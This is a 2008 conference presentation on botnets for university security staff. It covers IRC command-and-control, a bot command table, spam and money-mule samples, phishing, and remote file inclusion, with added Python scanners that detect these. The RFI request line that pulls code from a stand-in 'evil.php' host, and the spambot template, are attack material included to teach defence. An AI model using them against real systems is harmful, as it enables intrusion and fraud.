A Presentation For Educause Security Professionals 2008
by Craig A Schiller, CISSP-ISSMP, ISSAP
Portland State University, CISO
craigs@pdx.edu
Copyright Craig Schiller, 2008. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.
Agenda
Botnet Overview
Botnet Schemes
How Do They Get In?
What Can We Do?
Concluding Thoughts
[Diagram: IRC protocol connecting a group of bots, the remote controlled clients]
Remote controlled clients: Terminal Services, VNC, RDP, Carbon Copy, BackOrifice, SubSeven
Now, many definitions include the systems that execute the botherder's commands even if the malicious bot code is not present on them. These systems are remotely controlled; they would be considered bot clients if they were part of a net of remotely controlled clients, even if the bot mechanism is somewhere else.
2008 Craig A Schiller
Botnet Commands

Command          What it does
bot.command      Runs a command with system()
bot.flushdns     Flushes the bot's DNS cache
bot.quit         Quits the bot
bot.longuptime   If uptime is more than 7 days, bot will respond
bot.sysinfo      Displays the system info
bot.status       Gives status
bot.rndnick      Generate a new random nick
bot.remove       Removes the bot
bot.open         Opens a file
bot.nick         Changes the bot's nickname
bot.id           Displays the current code ID
shell.disable    Disable shell handler
shell.enable     Enable shell handler
shell.handler    Fallback handler for shell
commands.list    Lists all available commands
plugin.unload    Unloads a plug-in (not supported yet)
plugin.load      Loads a plug-in
inst.svcdel      Deletes a service
inst.svcadd      Adds a service
mac.login        Logs the user in
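Because these commands travel as ordinary IRC PRIVMSG text, the table above doubles as a detection vocabulary for anyone watching IRC traffic leaving a campus network. The following scanner is an added example, not code from the presentation: it assumes RFC 1459 message framing, treats a leading "." or "!" sigil before the command as optional (an assumption about herder habits, not something the slides state), matches only the first word of each message so ordinary chat that merely mentions a command name does not fire, and runs over constructed sample lines with RFC 5737 test addresses.

```python
import re
from typing import List, NamedTuple, Optional

# Command vocabulary copied from the "Botnet Commands" table above.
BOT_COMMANDS = frozenset({
    "bot.command", "bot.flushdns", "bot.quit", "bot.longuptime", "bot.sysinfo",
    "bot.status", "bot.rndnick", "bot.remove", "bot.open", "bot.nick", "bot.id",
    "shell.disable", "shell.enable", "shell.handler", "commands.list",
    "plugin.unload", "plugin.load", "inst.svcdel", "inst.svcadd", "mac.login",
})

# RFC 1459 message shape: ":nick!user@host PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


class C2Hit(NamedTuple):
    nick: str      # who issued the command (the suspected herder)
    target: str    # channel or nick it was sent to
    command: str   # normalised command from the table
    args: str      # remainder of the line, kept for the analyst


def parse_privmsg(line: str) -> Optional[dict]:
    """Return nick/target/text of a PRIVMSG line, or None for other traffic."""
    m = PRIVMSG_RE.match(line.strip())
    return m.groupdict() if m else None


def extract_command(text: str) -> Optional[str]:
    """Match only the FIRST token of the message against the command table.

    Assumption: a herder may prefix commands with a sigil such as "." or "!",
    so leading punctuation is stripped before the lookup.  Looking at the first
    token only keeps chat that merely mentions a command name from firing.
    """
    parts = text.split(None, 1)
    if not parts:
        return None
    token = parts[0].lstrip(".!").lower()
    return token if token in BOT_COMMANDS else None


def scan_irc_lines(lines: List[str]) -> List[C2Hit]:
    """Flag PRIVMSG lines whose first token is a known bot command."""
    hits = []
    for line in lines:
        msg = parse_privmsg(line)
        if msg is None:
            continue
        command = extract_command(msg["text"])
        if command is None:
            continue
        parts = msg["text"].split(None, 1)
        args = parts[1] if len(parts) > 1 else ""
        hits.append(C2Hit(msg["nick"], msg["target"], command, args))
    return hits


# Constructed sample traffic (not a real capture); plugin name is hypothetical.
SAMPLE_IRC_LOG = [
    "PING :irc.example.test",
    ":herder!h@203.0.113.9 PRIVMSG #zombies :.bot.sysinfo",
    ":alice!a@198.51.100.2 PRIVMSG #chat :anyone seen the bot.status of the build server?",
    ":herder!h@203.0.113.9 PRIVMSG #zombies :.bot.nick zombie42",
    ":herder!h@203.0.113.9 PRIVMSG #zombies :!plugin.load update.dll",
]

if __name__ == "__main__":
    for hit in scan_irc_lines(SAMPLE_IRC_LOG):
        print(f"{hit.nick} -> {hit.target}: {hit.command} {hit.args}".rstrip())
```

On the sample, the three herder lines are reported and alice's chat line is not, even though it contains the string "bot.status"; in practice the hit list is only a starting point, and the nick, channel and the hosts that answer the command are what an analyst uses to confirm a C&C channel.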
[Timeline figure, 1988 to 2006]
1988  Invention of IRC
1989  Greg Lindahl invents GM, the first bot; GM plays Hunt the Wumpus with IRC users
1999  Pretty Park discovered: the first worm to use an IRC server as a means of remote control
1999  SubSeven trojan/bot: a remote control trojan that added control via IRC
2000  GT Bot, mIRC based: runs scripts in response to IRC server events; supports raw TCP and UDP socket connections
2002  SDBot, written in C++: source code available to the hacker community; small, single binary
2002  AgoBot, Gaobot: introduces modular design; 1st module breaks in and downloads the 2nd module; 2nd module turns off anti-virus and downloads the 3rd module; module 3 has attack engines/payload
2003  SpyBot: spyware capabilities (keylogging, data mining for email addresses, lists of URLs, etc.)
2003  RBot: most prevalent bot today; spreads through weak passwords; easily modifiable; hides from detection; uses packaging software
2004  PolyBot: a derivative of AgoBot with polymorphic ability; changes the look of its code on every infection
2004  My Doom: mass emailing worm with bot IRC C&C
2005  MYTOB
Russian Business Network study, by David Bizeul (Ref: Bizeul.org, 11/21/07)
12 Levashovskiy Prospect, 197110 Saint-Petersburg, RU
RBN Operations
Services: Some external services are used by RBN and affiliates. Those services can be MX relay or NS hosting.
RBN: This is the core business of RBN. It is used to offer hosting for cybercrime. Inside this part, we can identify the direct subsidiaries of RBN: Nevacon and Akimon.
Hosting: This is the part used to host most of RBN's public websites and to register RBN domain names. Hosting and registration is a really strong partner for RBN. Incidentally, it could be possible that those two blocks are under the same company.
Telecom: This is the entity which aims at providing the Internet access. It seems that SBTel has obtained access from Silvernet to the Saint Petersburg Internet Exchange Point (SPBIX).
Ref: Bizeul.org, 11/21/07
RBN Operations
[Diagram of RBN network relationships: SILVERNET, CREDOLINK, RBN, OINVEST, SPB IX, DELTASYS, INFOBOX, DATAPOINT]
[Chart: 19 values, each paired with a country code; chart title and axis labels not recoverable]
1018 CZ; 49 RU; 23 RU; 21 RU; 17 RU; 13 HK; 11 TW; 10 AE; 9 RU; 7 RU; 7 TR; 6 RU; 5 HK; 5 US; 3 MY; 3 RU; 2 RU; 2 TR; 2 TW
Botnet animation
Modular, Adaptive, Targetable
Spam
Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
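The template above is what a spambot fills in before sending: every %NAME token is replaced per message, and the first Received line is forged to claim a private 192.168.0.x source so the message looks like it has already passed through an internal relay. When the rendering misfires, macro names leak into delivered mail, and the forged hop survives either way. The following triage check is an added example, not from the slides; it looks for both signs in a captured message. The sample message is constructed, and every host and address in it is a placeholder (example.test names and RFC 5737 ranges).

```python
import ipaddress
import re
from email import message_from_string
from email.message import Message
from typing import Dict, List

# A template macro looks like %NAME or %NAME[10] (cf. %RND_DIGIT[10] in the template).
MACRO_RE = re.compile(r"%([A-Z][A-Z0-9_]*)(?:\[\d+\])?")
# First clause of a Received header: "from <host-or-ip> ..."
RECEIVED_FROM_RE = re.compile(r"^from\s+(\S+)", re.IGNORECASE)


def find_unexpanded_macros(raw_message: str) -> List[str]:
    """Names of template macros the spambot failed to substitute."""
    return sorted(set(MACRO_RE.findall(raw_message)))


def private_source_hops(msg: Message) -> List[str]:
    """Received hops whose claimed source is a private (RFC 1918) address.

    The template forges "Received: from 192.168.0.%RND_DIGIT ..." to fake an
    earlier internal hop.  A hop that claims a private source yet was supposedly
    relayed by an external host is a strong template-spam marker.
    """
    flagged = []
    for received in msg.get_all("Received", []):
        m = RECEIVED_FROM_RE.match(received.strip())
        if not m:
            continue
        try:
            addr = ipaddress.ip_address(m.group(1))
        except ValueError:
            continue  # a hostname rather than a literal address
        if addr.is_private:
            flagged.append(str(addr))
    return flagged


def assess_message(raw_message: str) -> Dict[str, List[str]]:
    """Combine both checks into one triage record."""
    msg = message_from_string(raw_message)
    return {
        "unexpanded_macros": find_unexpanded_macros(raw_message),
        "private_source_hops": private_source_hops(msg),
    }


# Constructed sample: a partially rendered template as seen at the victim's MX.
# The top Received line was added by the real receiving MX; the one below it
# came from the spambot and mirrors the template's forged first hop.
SAMPLE_SPAM = """\
Received: from mail3.example.test (mail3.example.test [198.51.100.25])
 by mx.victim.test with ESMTP id 7F3A1; Thu, 01 Mar 2007 09:14:03 -0600
Received: from 192.168.0.57 (203-0-113-44.%RND_FROM_DOMAIN [203.0.113.44])
 by mail3.%RND_FROM_DOMAIN (envelope-from bob@example.test)
 (8.13.6/8.13.6) with SMTP id kq4Hs2; Thu, 01 Mar 2007 09:14:01 -0600
Message-Id: <8831920044.kq4Hs2@mail3.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
Subject: %SUBJECT
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME

%MESSAGE_BODY
"""

if __name__ == "__main__":
    print(assess_message(SAMPLE_SPAM))
```

Either finding alone is enough to route a message to quarantine; the macro list is also useful for clustering, because messages from the same template share the same macro names even when the rendered content differs.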
SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy
Extortion
Phishing Overview
[Diagram: one botnet client hosts the phishing website; another botnet client sends the spam]
Money Mule
1. Fraudsters contact prospective victims:
   "I am Mr. Richard H. Mason President/CEO MM Group Handling. We are a trading company that is into the hire, sales and service of Electrical Trucks, Fork Trucks and associated materials handling equipments and diverse range of battery for electric vehicles which can be readily adapted for customers specific requirements to the America and selected locations in Europe. We are searching for individuals or a company who can act as our representative/payment agent in your country and earn 10% of every payment made through you to us."
2. The crime rings persuade the victim to come and work for their fake company.
3. Money mules receive funds into their accounts. These funds are stolen from other accounts that have been compromised.
4. Mules then are asked to take these funds out of their accounts and forward them overseas (minus a commission payment), typically using a wire transfer service.
Source: Bank Safe Online
[Animation frame: six phishing hostnames, each pointing to one of 127.0.0.1 through 127.0.0.6]
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
[Diagram: Attacker and Target.com]
1. GET /a.php?vuln=http://webhost.com/evil.php
4. The output from evil.php is sent to the Attacker
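The request in step 1 has the classic remote file inclusion shape: a query parameter whose value is itself a URL, which the target's PHP include pulls from the attacker's web host and executes, so the output of evil.php comes back in step 4. The scan below is an added defender-side example, not from the slides: it reads web-server access logs in Common Log Format and flags any request where a parameter value begins with a remote URL scheme. The log lines are constructed (RFC 5737 addresses; the page's own webhost.com/evil.php URL), and the allow-list of parameters that legitimately carry URLs is an assumption to be tuned per site.

```python
import re
from typing import List, NamedTuple
from urllib.parse import parse_qsl, urlsplit

# Common Log Format: host ident authuser [date] "METHOD path PROTOCOL" status bytes
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Assumed allow-list: parameters on this site that legitimately carry a URL
# (e.g. a post-login redirect).  Anything listed here is NOT inspected, so keep
# it short and review it when the application changes.
URL_PARAMS_ALLOWED = frozenset({"return_url"})


class RfiAttempt(NamedTuple):
    ip: str        # requesting client
    path: str      # script that was asked to include the remote file
    param: str     # parameter carrying the URL
    url: str       # the remote URL, percent-decoded
    status: int    # HTTP status the server answered with (useful for triage)


def find_rfi_attempts(log_lines: List[str]) -> List[RfiAttempt]:
    """Flag requests in which a query parameter value is itself a remote URL."""
    hits = []
    for line in log_lines:
        m = CLF_RE.match(line)
        if m is None:
            continue  # not a Common Log Format record
        parts = urlsplit(m["path"])
        # parse_qsl percent-decodes values, so "http%3A%2F%2F..." is seen as "http://..."
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in URL_PARAMS_ALLOWED:
                continue
            if REMOTE_SCHEME_RE.match(value.strip()):
                hits.append(RfiAttempt(m["ip"], parts.path, name, value, int(m["status"])))
    return hits


# Constructed sample log (not a real capture).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [21/Nov/2007:10:02:11 -0800] "GET /a.php?vuln=http://webhost.com/evil.php HTTP/1.1" 200 512',
    '198.51.100.3 - - [21/Nov/2007:10:02:12 -0800] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '203.0.113.7 - - [21/Nov/2007:10:02:13 -0800] "GET /a.php?vuln=http%3A%2F%2Fwebhost.com%2Fevil.php%3F HTTP/1.1" 404 310',
    '198.51.100.9 - - [21/Nov/2007:10:03:00 -0800] "GET /login.php?return_url=https://portal.example/home HTTP/1.1" 302 0',
    'this line is not an access-log record',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_ACCESS_LOG):
        print(f"{hit.ip} {hit.path} {hit.param}={hit.url} -> {hit.status}")
```

The two hits both come from one client probing the same parameter, once plainly and once percent-encoded; the status code tells the responder which requests the server actually served (200) and which it rejected (404), which is the first thing to check before treating the host as compromised.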
Best Bot left the A/V tray icon and a fake GUI
Nothing Important
"I checked and I didn't see anything"
Your space, network, & processing power:
- Child Pornography
- Bestiality
- Stolen movies, games, & software
Your access:
- Student records
- SSAN
- University resources
- Your email
- Your money
- Your identity
[Diagram: life of a bot client]
1. Computer is exploited
2. Becomes a bot (A/V detection may occur here)
3. Report result to the C&C channel
4. Retrieve the payload module from the download server
5. Execute the commands from the C&C
6. On command, erase all evidence and abandon the client
"I checked and I didn't see anything"
- Host based A/V, Anti-Spam, Anti-Spyware
- Enterprise Reporting
- User Help Desk Tickets
- Abuse notifications
- Quasi-Intelligence Organizations
- Monitoring & Analysis: Ourmon; Firewall & Router logs; IDS/IPS, Host and Network; Darknets, Honeypots; DNS; Server & Workstation Log analysis; Malware analysis (Sandbox); Forensics
Quasi-Intelligence Organizations
Mailing lists:
- REN-ISAC
- Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
- Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
- Nanog

- Shadowserver
- Castlecops.com: MIRT, PIRT
- Vendor
- ISC Storm Center
- APWG
- http://www.bleedingthreats.net/fwrules/
Closing Thoughts
Q&A
Questions?